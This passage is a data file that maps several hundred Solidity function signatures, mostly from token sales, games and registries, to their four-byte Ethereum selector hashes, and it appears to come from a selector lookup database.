"indiFundAndSocialVault()": "0x546efd98", "wrongManagerOrUnsetInClaimer()": "0x2cdcb1fc", "totalRoundsPassed()": "0xfa691a26", "oldTokenAddress()": "0xd8542d51", "statement()": "0xe42cb9f3", "couponTokenBountyAddr()": "0xa4254fb4", "giveBirthByUser()": "0x0de0b1bc", "tier0LOT()": "0x4b3955a5", "withdrawnAmountForSalePromotion()": "0x3711e829", "crafting()": "0x91f1cf05", "multiplierOfPrice()": "0xc71bf8ba", "softcap()": "0xf89be593", "toggleTransferablePending()": "0x2813de17", "icoAbandoned()": "0xc2f0d93f", "CHINESE_EXCHANGE_BUYIN()": "0x1999cf37", "ELIXAddressSet()": "0x591090ee", "CROWDSALE_TOKEN_IN_WEI()": "0xe0772f6a", "ParentFee()": "0xa0111086", "shopPants()": "0xcd05d1eb", "votedYes()": "0x7c24b295", "opAddr()": "0x5b73024a", "remark2()": "0x761c3688", "cnyEthRate()": "0xa46841e1", "totalDecimals()": "0x417cb353", "supplyDAICO()": "0x68664430", "hardcapUSD()": "0x57e233e2", "RANGESTART_2()": "0x7ab7e492", "deathData_f5()": "0xcb884207", "TIME_TO_MAKE_TOMATOES()": "0x0c74be3d", "proofImpl()": "0x926baab2", "firstPrivateLockTime()": "0x0ebbe5d6", "stage4Bonus()": "0x8703e506", "sendOneEtherToHome()": "0xbf606d14", "sendOneEtherToMiner()": "0xae188884", "getContractCreationTxOrigin()": "0x750dd523", "getContractCreationTxGasprice()": "0xdd5a7f40", "getContractCreationGas()": "0x3add5a99", "getContractCreationData()": "0x3bd5c209", "msgExaminer()": "0xbe6cef0a", "ANMFutureVesting()": "0x97425a54", "IndorseToken()": "0xeedc9a8d", "safeMult(uint256,uint256)": "0x64b3302d", "produce()": "0x656b9952", "StorageFactory()": "0xfaac90ec", "setIntValue(bytes32,int256)": "0xa77aa49e", "getIntValue(bytes32)": "0x9007127b", "setBytesValue(bytes32,bytes)": "0xc9a52d2c", "getBytesValue(bytes32)": "0x44bfa56e", "setStringValue(bytes32,string)": "0xf5866066", "getStringValue(bytes32)": "0xa209a29c", "Disbursement(address,uint256,uint256)": "0x74ff90ba", "FailingDeployment()": "0xbb1f602e", "execReturnValue(uint256)": "0x4bb22b5a", "processContribution()": "0x677ab197", "contributeBTCs()": "0xb3cffc6e", "contributeETH()": "0x175323a8", "computeReturn(uint256)": "0x1fc3a519", "enableRealCap(uint256,uint256)": "0xad03abc5", "computeRealCap(uint256,uint256)": "0xe2119c80", "refundRoots()": "0x961c2470", "releaseRoots()": "0x8c701ba8", "getPaymentAmount()": "0x3e8817aa", "isBurnApproved()": "0xe6107cbb", "isFundFreezePeriodEnded()": "0x343214ae", "isReleaseApproved()": "0xceffbaf1", "vote(bool,string)": "0xefcee869", "PensionFundRelease(address[],address,address,uint8,uint256,uint256,uint8,address)": "0xed1ba837", "garbageCollect()": "0xf5672f92", "notifyTempBreach(int256)": "0xe5e45b16", "withdrawPayment()": "0xa118babd", "confirmReception()": "0xbaa2e587", "confirmCollection()": "0x1f86ab51", "selectDeliverer(uint256)": "0xf615e369", "deliverCandidate(uint256,uint256)": "0xef660ab8", "Shipment(address,address,string,string,int256,int256,uint256,uint256)": "0x42aeba30", "createShipment(address,string,string,int256,int256,uint256,uint256)": "0x6142ff70", "PePaDe()": "0xd3a699cd", "ProxyMock()": "0x9782e1ec", "test_updateAndGetPrice()": "0xa8db1837", "test_assetRegistration()": "0xc0741c53", "test_setupSucceeded()": "0x0dcaf3e2", "Test(uint8)": "0xeb6d509e", "createSellingProposition(address,uint256,uint256,uint256)": "0x1e561d5e", "allowTokenContract(address)": "0x6abfbf6f", "etherToWei(uint256)": "0xd8916bb9", "weiToEther(uint256)": "0xd0eff891", "TokenExchange()": "0x4c26aaa2", "splitFunds()": "0x1b814f02", "determineWinner()": "0x33b16d93", "playerTwoReveal(bytes32,bytes32)": "0x10a78f4a", "playerOneReveal(bytes32,bytes32)": "0x6c767f20", "playerTwoCommit(bytes32)": "0x98b0787e", "playerOneCommit(bytes32)": "0x97d4f342", "RockPaperScissors(address,address,uint256)": "0x72923378", "nextStage()": "0xee3743ab", "Orientation(bytes32[])": "0xeb965c5e", "max()": "0x6ac5db19", "displayMessage()": "0x2d59dc12", "isTakePermitted(uint256,uint256,address,address,uint256,uint256)": "0x80603faa", "isMakePermitted(uint256,uint256,address,address,uint256,uint256)": "0x71ad3e73", "getContentAt(uint256)": "0x81de10e2", "getTagAt(uint256)": "0xd857eba6", "getSPBalance(address)": "0x0963415c", "getFundSPBalance()": "0x826679a1", "getEtherBalance(address)": "0xdc45d08e", "getFundBalance()": "0xdae9e379", "borrowEther(uint256)": "0x8a973e17", "saveEther()": "0x6258d524", "savingPoints()": "0x3c263cf4", "transferOnBehalf(address,address,uint256)": "0x8a3b0199", "TokenContract(address,string,string,uint8)": "0x02b6f286", "transferVotes(uint256,address)": "0x4a716adf", "castVote(uint256,uint256)": "0x2c0a3f89", "addVoteOption(uint256,string)": "0x585f9b7a", "createElection(string)": "0x15cf4a5f", "deleteVoters()": "0x413499f1", "getResults(uint256,string)": "0xc1e71903", "getVotes(uint256,address)": "0x68197360", "getVoteOptions(uint256)": "0xf1e6bb1c", "getVoteOptionId(uint256,string)": "0x66b728d5", "getVoteOption(uint256,uint256)": "0xb4ed7ec3", "isVoter(address)": "0xa7771ee3", "getElectionName(uint256)": "0x52675be3", "getElectionId(string)": "0xe5bf1b75", "getVotersLength()": "0xde2237d3", "price(uint256)": "0x26a49e37", "tokensAreLiquid()": "0x3396c405", "hasFinished()": "0xfe5815a6", "HelloSystem()": "0xc485297b", "getMsg()": "0xb5fdeb23", "deleteBooleanValue(bytes32)": "0x3cc1635c", "setBooleanValue(bytes32,bool)": "0x3eba9ed2", "getFirstTwoOutputs(bytes)": "0xe0303a2e", "getBytesLE(bytes,uint256,uint256)": "0xd5c9712f", "parseVarInt(bytes,uint256)": "0x4d7dcfbd", "finalizePublicICO()": "0x92710c60", "finalizePreICO(uint256)": "0x3423a768", "SMTToken(uint256,uint256)": "0x02b33929", "PlayChapToken()": "0x11497c69", "supplyICO(address)": "0x1b3e704a", "supplyPICO(address)": "0x375c4627", "deleteOwner()": "0x3bae15df", "getTimeUntilEnd(uint256)": "0xd2c49b7f", "getEndTime(uint256)": "0x9067b677", "getHodlAmount(uint256)": "0x6ccbdbf9", "getHodlHasBeenWithdrawn(uint256)": "0x2726a530", "getHodlOwner(uint256)": "0x5fe825f8", "changeMaximumHodlDuration(uint256)": "0x0edc1923", "createNewHodl(uint256)": "0x59c77133", "Hodl(address)": "0x22a635c4", "changeEtherTxLimit(uint256)": "0xe7cf6fcb", "CATContract(address,string)": "0x78452d65", "BETHERcoin()": "0x2d9eceb5", "drop(address[],uint256[])": "0xc01ae5d3", "DEXLITE()": "0x44b1d6e3", "XYOracleBonus()": "0xd933c1fb", "OnlineSocialChainToken(uint256,string,uint8,string)": "0x83fbbc7a", "LIV()": "0x9bf0093c", "ShanxiCoin()": "0xa0013419", "SkrumbleCandyToken()": "0x615878c8", "_createCutie(uint40,uint40,uint16,uint256,address,uint40)": "0x8e90e1e9", "MeteorToken()": "0xa7a60580", "SEELE()": "0xf2125f40", "finishRoundAndStartNew()": "0x4568fb50", "benefit()": "0x2e5113b7", "processTicketBuying(string,uint256,address)": "0x7545f9a1", "buyTicket(uint256,string)": "0x9afb93cb", "startNewPeriod()": "0xb9d723eb", "Lotery(uint256,uint256,uint256,uint256,address,uint256)": "0xf94df97f", "GuessNumber()": "0xed621df6", "purchase(uint256,uint256,address)": "0xea3bd5df", "BulkTransfer()": "0xa5b3720b", "EthereumTravelCrowdsale(uint256,address,address)": "0x6ed963b7", "ensureTokensAvailable(uint256)": "0xb010d80e", "createPromise(address,uint256,uint256)": "0xc34ba3e9", "pendingTokenBalance()": "0xfe549815", "uncommittedTokenBalance()": "0x326360fe", "getPromiseIds(uint256,uint256,address,bool)": "0x6bc9b0d7", "getPromiseCount(address,bool)": "0x060ffb99", "collectableTokenBalance()": "0xac28ff48", "canCollect(uint256)": "0xc5ed8c99", "withdrawAllUncommittedTokens()": "0x2ccde4bd", "withdrawUncommittedTokens(uint256)": "0x2b8cd2f7", "lockup(address,uint256,uint256)": "0x5e1372f4", "SingleTokenLocker(address)": "0x894f6531", "CRYPTOBITECOIN(uint256,string,string)": "0x5be989d1", "getPoohsSinceLastHatch(address)": "0xb5999c12", "getMyPoohs()": "0x13b222ba", "getMyPlumbers()": "0x61463838", "getFreePlumber()": "0xeeab221c", "calculatePoohBuySimple(uint256)": "0xd8bf1773", "calculatePoohBuy(uint256,uint256)": "0xc4d18b18", "calculatePoohSell(uint256)": "0x61d5593c", "buyPoohs()": "0x75cf77fb", "sellPoohs()": "0x1e2e35a4", "hatchPoohs(address)": "0x5d4293a0", "setStartTime(uint256,uint256)": "0xba278e08", "launch(uint256)": "0x85b12c7c", "setSoftCapDeadline(uint256)": "0xb17fc36d", "FunFairSale()": "0x8b5de2d9", "mintCoreToken(address[])": "0x189f9041", "NucleusVisionCoreToken()": "0xfde3cbd6", "setAuctionWinnerMessageHash(bytes32)": "0x0dfdcb76", "setDescriptionHash(bytes32)": "0x18804b0d", "claimIcoContribution(address)": "0x7b81c3cd", "cancelIco()": "0xb2fa9206", "isKeyHolder(address)": "0xd93d6ad0", "withdrawShares(address)": "0xed03d0da", "finishAuction()": "0x430ca46f", "calculateUserBid()": "0x1c89f174", "bidInAuction()": "0x09e25141", "canStartAuction()": "0xc9efda2c", "distributeTokens(uint256)": "0x7366794e", "contributeInIco()": "0x5042ffbe", "TrivialToken(string,string,uint256,uint256,address,address,uint256,uint256,uint256,bytes32)": "0xa781384e", "BliBliToken(address,uint256)": "0xf94aa8bf", "USA()": "0x22ff79d8", "OddCoin()": "0x3a6514c8", "grant()": "0x30c3eaa8", "LockedOutTokens(address,address,uint256,uint8,uint256,uint256)": "0x315ebe81", "curse(address,address)": "0xd725f10d", "setCursedContract(address)": "0xf060f617", "UncursedToken()": "0xa1659822", "getAmountToUpdate(uint8)": "0xef14124f", "upgradeLevel(uint8)": "0xaabf382b", "buyReferTokens(address,uint8)": "0x497b383e", "distributeMoney(address,address,uint256)": "0x6c1d0157", "fundAccount(address,uint256,uint256)": "0x77738ce7", "decrement(address)": "0xe8d3280f", "withDrawalether(uint256)": "0xaf4c9b3b", "getAccDetails(address,address)": "0x057b0416", "numberofGamePlay()": "0x828f4057", "setPremiumFactors(bytes32,uint256,uint256)": "0x802de8fc", "createUpdateRisk(bytes32,bytes32,uint256)": "0x128a1c74", "getPremiumFactors(bytes32)": "0x9d5176fd", "getRiskParameters(bytes32)": "0xcdcdb463", "setDelay(uint256,uint8,uint256)": "0x19a08058", "setPayouts(uint256,uint256,uint256)": "0x0d4c8f62", "setWeight(uint256,uint256,bytes)": "0xffe280ee", "getRiskId(uint256)": "0xeb807339", "getPolicyState(uint256)": "0x43f46a5c", "getPolicyData(uint256)": "0x7a5402e9", "getCustomerPremium(uint256)": "0xc168e037", "getLedger(uint8)": "0x196f9aa5", "setLedger(uint8,int256)": "0x36be2a73", "getAccessControl(address,address,uint8)": "0xd45efad5", "setAccessControl(address,address,uint8)": "0xca2d553a", "setAccessControl(address,address,uint8,bool)": "0xc58a3321", "FlightDelayDatabase(address)": "0x03ffae3b", "addThing(bytes32,bytes32,string,string)": "0xb7b48388", "getIndex(string)": "0xea1bbe35", "publicKeyConsensus()": "0x8e7d0f44", "isOrganizer(address)": "0x41676f15", "signWholeConfiguration()": "0x210790c8", "configSignOrganizers()": "0x72ee91c2", "getSignedConfiguration()": "0x5a52ecf6", "getOrganizersAddresses()": "0x23266dfe", "setConfiguration(string,string,uint256,address[],uint256)": "0x0c01b2ae", "popcontract()": "0x2cba85c6", "generateMemoryProof(uint256[],uint256)": "0x51b30900", "getStateHash(bytes,uint256)": "0x6a2c1ace", "getStateProofAndHash(bytes,uint256)": "0x47040cb4", "getStateAndProof(bytes,uint256)": "0xc96d2dfa", "run(bytes,uint256)": "0x194e10ce", "EthTranchePricing(uint256[])": "0x30e77c75", "creditDividends(uint256)": "0x9021c03d", "dilute(uint256)": "0xc99ff644", "withDraw()": "0x0fdb1c10", "smartProperty(uint256,string,uint8,string,address,uint256,uint256,uint256)": "0x4f53e83e", "withdrawEtherTo(address,uint256)": "0x1baffe38", "depositEtherFor(address)": "0x4faa8a26", "t02_createContractMac(bytes32,bytes32)": "0x90b7ddd7", "t01_setKey(bytes32)": "0xc6c99744", "clientVerifyKeyHash(bytes32,bytes32,bytes32,bytes32)": "0x22de2457", "setKeyHash(bytes32)": "0x98544710", "_offlineHash(bytes32,bytes32,bytes32)": "0x2c142511", "PriceDiscovery(address,address)": "0x4337b391", "Loan(uint8)": "0x93012d5f", "changeOwner(string,address)": "0xd8f9d144", "registerProject(string,string)": "0x177b3010", "createNamespace(string,address)": "0xf9f22d6c", "register(string,string,string,string,string,string)": "0x104ace02", "canWrite(string,address)": "0x355eb2c0", "getChecksum(string,string,string)": "0x87551db0", "getSource(string,string,string,string)": "0xd46f8eb1", "LegalContractManager()": "0x1b8202a7", "getVersion(string,string,uint256)": "0xedcf6b26", "getNbVersions(string,string)": "0x23221f1e", "getProject(string,uint256)": "0xf089e2ed", "getNbProjects(string)": "0x8aa43284", "getNamespace(uint256)": "0xe833cc12", "getNbNamespaces()": "0x397f2a71", "currentUser()": "0x92ee0334", "getAgreements()": "0xcf7e9242", "createAgreement(string,string,uint8,uint256,uint256,uint256,address,address,uint256)": "0x44aa8b0e", "isFinal(bytes32[])": "0x227dd788", "isSuperior(bytes32[],bytes32[])": "0xe5d5c898", "getNonce(bytes32[])": "0x4439defa", "TokenOwnedFund()": "0x84b1fcb6", "EtherFundMeCrowdfunding(string,string,string,uint256,uint256,uint256,address,address)": "0x86d54fe1", "sendFeeToWallet(address,address)": "0xdd3ff4f6", "burnReserveFees(address)": "0xf6486cad", "setEnable(bool)": "0x7726bed3", "add(uint8)": "0x02067e6a", "submitTally(uint256,uint256,uint256)": "0xce97f61a", "changeVariables(uint256,uint256)": "0xeac80b2d", "AuthorityController(address,address[],uint256,uint256,address)": "0x9dd52927", "setJobAccepted()": "0xc2ba857e", "setJobCompleted(bytes)": "0x078c0452", "setWalletContract(address)": "0x27ccdbc5", "logEscapeHatchChanged(bool)": "0xa3b1dc52", "logTimestampSet(uint256)": "0xc8e6b2a8", "logUniverseForked()": "0x4a812023", "createChildUniverse(bytes32,uint256[],bool)": "0x8892bb73", "removeContract()": "0xfe389e09", "registerName(bytes32,address,uint16)": "0x0958f83d", "deleteOrder(uint256)": "0x11a00327", "claimOrder(uint256)": "0x3a3f8239", "placeOrder(address,uint256,address,uint256)": "0xafe18413", "redeemCoupons(uint256,string)": "0xb916c5ff", "invest(uint256,string)": "0x1a5eba21", "MSPMock(address)": "0x25461328", "communityVote(bytes32,bool)": "0xc4b7c4cf", "newManuscript(bytes32,string,address[])": "0x3aecca37", "Aletheia(address,address,address)": "0x8156afdf", "EIP20(uint256,string,uint8,string)": "0x6688e305", "setVault(address)": "0x6817031b", "finalizeFunding()": "0xa19ed39d", "doPayment(address)": "0x53e1a169", "Campaign(uint256,uint256,uint256,address,address)": "0x2a03b48b", "getAllDSP()": "0x99d18937", "getDSP(address)": "0x303a2372", "finilize()": "0x29a3fab9", "setCommunityTokensHolder(address)": "0x9acdc0e3", "setTeamTokensHolder(address)": "0x708cfb25", "TeamToken()": "0xc9f1b7f0", "GEZI()": "0x8a9d6bb1", "deployNewContract()": "0x96e9df8d", "retriggerDrawOnOraclizeError()": "0x9fdb35e7", "bytesToInt(bytes)": "0xf1a5fc99", "EtherShot()": "0x3130e89d", "Soniq()": "0xcbfc12ba", "removeWhitelistedTransfer(address,address)": "0x6dde8b18", "batchAddWhitelistedTransfer(address[])": "0xd40394be", "TLB()": "0x526ff1f0", "_canSetGameOver()": "0x485ac9fd", "_checkOpenGame()": "0x9c0d010e", "_openGameRange(uint256,uint256)": "0x9a8d36fa", "openGameRange(uint256,uint256)": "0xa94834a1", "_openGamePlayNos(uint256[])": "0x0527da64", "openGamePlayNos(uint256[])": "0x70fbf6e5", "_openGamePlayNo(uint256)": "0x6bb50f4c", "openGamePlayNo(uint256)": "0x4177340d", "_openGameLoop()": "0xea31c53c", "openGameLoop()": "0xf20de9d6", "seekOdd(uint256,uint256)": "0xef338b88", "setOdd(uint256,uint256,uint256)": "0xb9717b23", "_newGame(string,string,uint256,uint256,uint256,uint256,uint256,uint256)": "0x094d583b", "newGame(string,string,uint256,uint256,uint256,uint256,uint256,uint256)": "0x0faf2775", "setGameResult(uint256)": "0x243b22cf", "setDecider(address)": "0x4d7ba587", "SoccerBet(string,uint256,address)": "0x8b45ab24", "canSendGameGift()": "0x861cab52", "TIM5(uint256,string,uint8,string)": "0x05ca11cf", "TilcoinStorage()": "0x08d79718", "HplusToken()": "0x91b2413f", "Team(address)": "0xd515b1ce", "candidateInformation(uint256)": "0x88538c36", "registerCandidate(string,string)": "0x0dbce4dd", "transferCrowdsale(address,uint256)": "0x87355084", "AssetToken(uint256,string,uint8,string,address)": "0x507a8e40", "perform_withdrawal(address)": "0x6c0ebc6c", "PIN(uint256,string,string,uint256,uint256,uint256)": "0xf2408d6b", "migrate(string)": "0xc9c5b5b4", "setMigrationAddress(address)": "0x4732a7dc", "upgrade(string)": "0x0da95761", "unlistDomain(string)": "0xe34e7889", "setTransferAddress(string,address)": "0xdcccb41d", "configureDomainFor(string,uint256,uint256,address,address)": "0xcf775255", "configureDomain(string,uint256,uint256)": "0xda1fe7d5", "setResolver(string,address)": "0x733ccaba", "payRent(bytes32,string)": "0xcb01a9bf", "rentDue(bytes32,string)": "0x660b7ad5", "register(bytes32,string,address,address,address)": "0x4254b155", "query(bytes32,string)": "0x2eef3d65", "newBatch(bytes32)": "0x58c3c193", "Numa()": "0x776532de", "LacesToken(uint256,string,string)": "0x884c1480", "RXBbitToken()": "0x9b35928f", "guess(uint8)": "0x4ba4c16b", "Aikcoin()": "0x45668923", "setGenaroDevMultisig(address)": "0x16dfae3c", "setGNR(address,address,address)": "0x2eb516b8", "GenaroTokenSale(uint256,uint256,address,uint256,bytes32)": "0x6e4bfb37", "GRPlaceholder(address,address)": "0xe3f16a61", "SRGToken()": "0x2e247e4f", "_btcToken(address)": "0x635e2abf", "seekApproval()": "0xcfbbda3d", "setMainSaleStart(uint256)": "0x643d1be5", "validateKYC(address,bool)": "0x55afee43", "SBSToken()": "0x696fd28a", "LDIT()": "0x31b59508", "Enigma()": "0x3c90861c", "viewSpecific(string,uint256)": "0x38f22b42", "viewAll(string)": "0x1e41f63e", "verifyYourself(string,uint256)": "0x8c3e9e1a", "registerTransaction(string,address,uint256)": "0x900d3812", "SwftCoin(uint256,string,uint8,string)": "0x67e33df5", "CLCToken()": "0x5b228f88", "CashMateToken()": "0xba0d291b", "IHODLToken()": "0xc53e4387", "POMDA()": "0x35c648c5", "TokenCrowdsale()": "0x3d6f3366", "TraceToken()": "0xfaa679bf", "TraceCrowdsale()": "0xd1407bec", "setWhiteListAdmin(address,address)": "0xe617f204", "GeishaCoin()": "0x504b91b5", "TCCoin()": "0x8cc89e1b", "claimFees()": "0xd294f093", "alreadyClaimed()": "0x797f73ff", "myTotalStakeAmount()": "0xe89b727c", "myStakesOnCountry(uint256)": "0xdc8369ce", "getCountryStats(uint256)": "0x3eeafccc", "confirmWinner()": "0xd55c9c84", "announceWinnerManually(uint256)": "0x05175786", "queryWinner(string)": "0x2721a114", "Eurovision()": "0x45ec9e87", "Halo3D()": "0x58f4f160", "canFinalize()": "0x71e28126", "reclaimStarted()": "0x9e33f72c", "setReclaimPeriod(uint256)": "0xaf418e4c", "setBackup(address)": "0xb7dacbf1", "paySmartContract(bytes32,uint256[])": "0xf9cdbc4e", "getAdvertisers(bytes32,uint256)": "0xb64ff868", "getAcceptance(address,uint256)": "0x8b13dd7b", "CertifyDelegate(address)": "0x95b3559f", "collectBack()": "0x3d03582f", "getCurrentCandyAmount()": "0x4d846c8e", "airDrop(address,uint256[],address[])": "0xd6916c34", "AkirasToken()": "0x9b0a4764", "cancelBooking(address,address)": "0x0c4ae1ca", "bookingBalanceOf(address,address)": "0x5981f187", "Ico()": "0x5ef013d0", "createForwarder(address)": "0x9193ba0b", "ForwarderTarget()": "0x08f9732b", "dealRevert(uint256)": "0x66365082", "finishDeal(uint256,uint256)": "0xc3dc0083", "confirmSeller(uint256,uint256)": "0xa9dbe76f", "confirmPayer(uint256,uint256)": "0x42fea02b", "createNew(uint256,address,address,address,uint256,uint256,uint256,uint256)": "0x038ccee8", "SHRToken()": "0x040e33f0", "CLITOKEN()": "0xccf8e5d0", "Neurus()": "0x8e36a9f1", "JustOneToken2()": "0xd017f49b", "IDOToken()": "0x87e44935", "unlockAddr()": "0x52063985", "getUnlockTime(address)": "0xdbed1e88", "mintLVE(address,uint256,uint256)": "0x76be6c24", "disTrust(address)": "0x85a345e2", "setAllowedAdd(address)": "0x7b8fa867", "setFinancingsAdd(address)": "0xc7c83804", "setRFFSessionsAdd(address)": "0x915d44f6", "setBidSubmissionProofsAdd(address)": "0x1a1c59e2", "setFinancierParticipationAdd(address)": "0x965b2bae", "setAquiferInstituteCoinAdd(address)": "0x8a9c636c", "isAllowedToUpdateProxy(address)": "0x3b6e31bb", "adminAddAction(bytes32)": "0x8d0f403a", "isAllowedUser(address)": "0x9fe34d9f", "isAllowed(bytes32,address)": "0x82027b6d", "invariantBroken()": "0x679c0d40", "baxianchain()": "0x015cb8cf", "DAILYC()": "0x429aa0a4", "updateAllComponents()": "0x1809549f", "approveComponents()": "0x63a10042", "getETHFromTokens(uint256)": "0xe90f84bd", "tokensWithAmount()": "0x659eeabc", "withdrawInProgress()": "0x7bb25d60", "setMaxTransfers(uint256)": "0xcedc2ce1", "getManagementFee()": "0x9c2b1a95", "setManagementFee(uint256)": "0xfe56e232", "addOwnerBalance()": "0x05f8d55d", "getAssetsValue()": "0x74d16c37", "getTokensAndAmounts()": "0xa3e2ce24", "registerInNewMarketplace()": "0xa0ffe7bb", "hasRisk(address,address,address,uint256,uint256)": "0x089f7f85", "reimburse()": "0xd3927c15", "startGasCalculation()": "0xa6c30b29", "calculateFee(address,uint256)": "0x8b28ab1e", "getOwnProducts()": "0x83255d6e", "registerProduct()": "0xdfd92f8a", "getAllProducts()": "0x02ee3a52", "setAllowed(address[],uint8,bool)": "0x9375206a", "isAllowed(uint8,address)": "0xcf46db5b", "disable(uint8)": "0x42340458", "enable(uint8)": "0x2f038fd5", "getTotalWithdrawAmount()": "0xc77e7614", "getUserRequests()": "0x5ad7c05c", "rebalanceGetTokensToSellAndBuy()": "0x400bbbd8", "recalculateTokensToBuyAfterSale(uint256,uint256[])": "0x887b1b0b", "getLatestComponent(string)": "0xd4ba769c", "getComponent(string,string)": "0x46cc3179", "approveComponent(string)": "0x7867060d", "updateComponent(string)": "0x1ca3630a", "PRIMEx()": "0x617d2c84", "createNewVesting(address,uint256,uint256,uint256,string,uint256,bool)": "0x788c26b4", "withdrawalAllowed(address)": "0x685ca194", "GlobalTechToken()": "0xc7e5fc3b", "PALToken99(uint256,address)": "0xb23605eb", "ASSC()": "0xb5c73816", "confirmReturnToken(bytes32,string,bytes32,bytes32,uint256,uint256,uint256,uint256,uint256)": "0xd6a62445", "confirmTokenTransferToBooking(bytes32,string,bytes32,bytes32,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xd385293d", "partnerAllocateRestrictedTokenTo(bytes32,bytes32,uint256)": "0x65540940", "allocateRestrictedTokenToPartner(bytes32,bytes32,uint256)": "0x95fc799f", "withdrawUnallocatedRestrictedToken(uint256,bytes32)": "0x16b6c7bd", "allocateRestrictedTokenTo(bytes32,bytes32,bytes32,uint256)": "0x4a975d6b", "withdrawTokenToClientAccount(bytes32,bytes32,address,uint256)": "0x64c638d5", "receiveTokenByClientAccount(string,uint256,address)": "0xdbd84659", "setWalletToClientAccount(bytes32,address,bytes32)": "0x3d1aac95", "AdjustClientAccountBalance(bytes32,bytes32,bytes32,string,uint256,string,uint256)": "0x736a1b9a", "cancelTransaction(bytes32,string,bytes32,bytes32,uint256,uint256,uint256,uint256,uint256)": "0x457610e5", "killTransaction(bytes32,bytes32,string,string)": "0xf3706bb7", "mod256(uint256,uint256)": "0x7ba5f145", "multisend2(address,address,address[],uint256[])": "0x1ca0076c", "ERC827Token(uint256,string,string)": "0xc39cb03f", "checkAddressTransfer(address,uint256,address)": "0x09d54b21", "ERC20Token(uint256,string,string,uint8)": "0x2445caf1", "MJCCToken()": "0x1a8f8f3e", "validTokenAmount(uint256)": "0x56378983", "unfreezeToken()": "0x6c64a678", "setBonus(uint256,uint256,uint256,uint256,uint256,uint256)": "0x7c989b45", "setDiscount(uint256,uint256,uint256,uint256,uint256)": "0x14bba4b8", "setSaleLength(uint256,uint256,uint256,uint256)": "0xc1321111", "buy(uint256,bytes32)": "0xe9fca283", "func_0C2C()": "0x0ed74c08", "func_0C0E()": "0xba485844", "func_0AB9()": "0x6971d64c", "func_0A93()": "0xe31e2d6d", "func_0A6E()": "0x304bac6f", "func_08D3()": "0x70357e79", "func_0778()": "0xe86c87d3", "func_0431()": "0xefed160f", "func_040B()": "0x85ae067b", "func_02E5()": "0xe4af8331", "main()": "0xdffeadd0", "noteSaleLocked(address,uint256,uint256,uint256)": "0x372cfcc3", "noteSale(address,uint256,uint256)": "0x811b1268", "transferApprover(address)": "0xa229b901", "forceWithdrawRejected(address)": "0x199d70f4", "withdrawRejected()": "0xc2e2a338", "updateStateBasedOnContributions()": "0x0f12354d", "updateStateBasedOnTime()": "0x40a0dd4b", "finalizePrivateIco()": "0xd43a7c16", "initPrivateIco(uint256,uint256,uint256,uint256,uint256)": "0xe19bc8e5", "isPrivateIcoActive()": "0x426d70fa", "isSellingState()": "0xeaf86db3", "moveState(uint256,uint256)": "0xebb9ab25", "setup(address,address,address,address,address,uint256,uint256,uint256[])": "0x991bcae8", "setupStates(uint256,uint256,uint256[])": "0x02b74a7e", "canMint(address)": "0xc2ba4744", "getMinimumContribution()": "0xf84038b1", "unreserve(uint256)": "0x76b5d926", "mintReserved(address,uint256,uint256)": "0x663f8549", "reserve(uint256)": "0x819b25ba", "CrowdfundableToken(uint256,string,string,uint8)": "0xc61ea7a3", "getTokenControlInfo(address)": "0xe7d4fd91", "getCompactData(address)": "0xe4a2ac62", "getBasicRate(address,bool)": "0xcf8fee11", "recordImbalance(address,int256,uint256,uint256)": "0xc6fd2103", "setTokenControlInfo(address,uint256,uint256,uint256)": "0xbfee3569", "setImbalanceStepFunction(address,int256[],int256[],int256[],int256[])": "0xbc9cbcc8", "getRate(address,uint256,bool,uint256)": "0xb8e9c22e", "tokenImbalanceData(address,uint256)": "0xa80c609e", "reserveContract()": "0xa7f43acd", "setQtyStepFunction(address,int256[],int256[],int256[],int256[])": "0x80d8b380", "getRateUpdateBlock(address)": "0x8036d757", "getTokenBasicData(address)": "0x721bba59", "getStepFunctionData(address,uint256,uint256)": "0x62674e93", "numTokensInCurrentCompactData()": "0x5085c9f1", "withdrawToken(address,uint256,address)": "0x3ccdbb28", "pendingAdmin()": "0x26782247", "enableTokenTrade(address)": "0x1d6a8bda", "setBaseRate(address[],uint256[],uint256[],bytes14[],bytes14[],uint256,uint256[])": "0x1a4813d7", "validRateDurationInBlocks()": "0x16265694", "disableTokenTrade(address)": "0x158859f7", "PCToken()": "0xc6c18e31", "ZapCloud()": "0x54032862", "CAKSale()": "0x8b2e2b07", "RostToken()": "0x7793868c", "TAUKEAYAM()": "0x8a2a0879", "BazraCoinToken()": "0x260e6885", "senderCheck(address,address)": "0x6b334e49", "resetValue()": "0x16e9fe81", "addValue(uint256)": "0x5b9af12b", "Add()": "0x67e06858", "nwmToken()": "0xf03fed22", "MercadoMoeda()": "0x3d38abd9", "Demor(uint256,string,string)": "0x6006eb9b", "BridgeTheChain()": "0x88a0e990", "ShakaliosToken()": "0xbfabe6c4", "Bitforce()": "0xd21bdee4", "JTOKEN()": "0x9593aa9a", "getValueInfo(address)": "0xc62fae5d", "getPersonalStatus(address)": "0xbb87b5f8", "getHeadInfo()": "0xd571dbac", "getPlayerJackpot(address,uint256)": "0xb5554e73", "getPlayerDividendByRound(address,uint256,uint256)": "0x9b8342d4", "getPlayerDividend(address)": "0x2e1d22b6", "getPlayerDividendByStage(uint256,uint256,address)": "0x5cd6bd0e", "endStage(uint256,uint256)": "0x23a50727", "endRound(uint256,uint256)": "0xe1a9a2b1", "buyPlayerDataRecord(uint256,uint256,uint256)": "0x1dc76e78", "buyStageDataRecord(uint256,uint256,uint256,uint256)": "0x8cc30c6f", "buyRoundDataRecord(uint256,uint256)": "0x79681c94", "promotionDataRecord(address,uint256)": "0x5a591a4e", "limitAmount(uint256,uint256)": "0x64d40354", "initStage(uint256,uint256)": "0x28bf4079", "buyAnalysis(address)": "0x68e5e22f", "Koyo()": "0x3815c742", "SS()": "0x8cc60eca", "withdrawTokensForEtheeraTeam(uint256,address[])": "0x3a579abc", "updateTokensForEtheeraTeam(uint256)": "0x3e352d49", "EtheeraCrowdsale(uint256,address)": "0xf93a8d96", "createProposal(uint256,string)": "0x02d52fa4", "TwinkleToken()": "0xa82d1d1a", "withdrawlBalance()": "0xf860a6d8", "BCNewToken()": "0xa0bdcd3a", "CLIP()": "0x65f5463e", "Mepoupe()": "0x078db9c9", "distributeDifferentAmountOfTokens(address[],uint256[])": "0xc9cb6f47", "getCourseID(address,address)": "0x61d60021", "rejectCertificate(address,address)": "0xcbdf02fb", "approveCertificate(address,address)": "0x8787c9ff", "tier3LOT()": "0x1770616c", "unlockDate1()": "0xc37bcb1e", "eButton()": "0x282d60bb", "returnOwnershipOfToken()": "0x427eebfc", 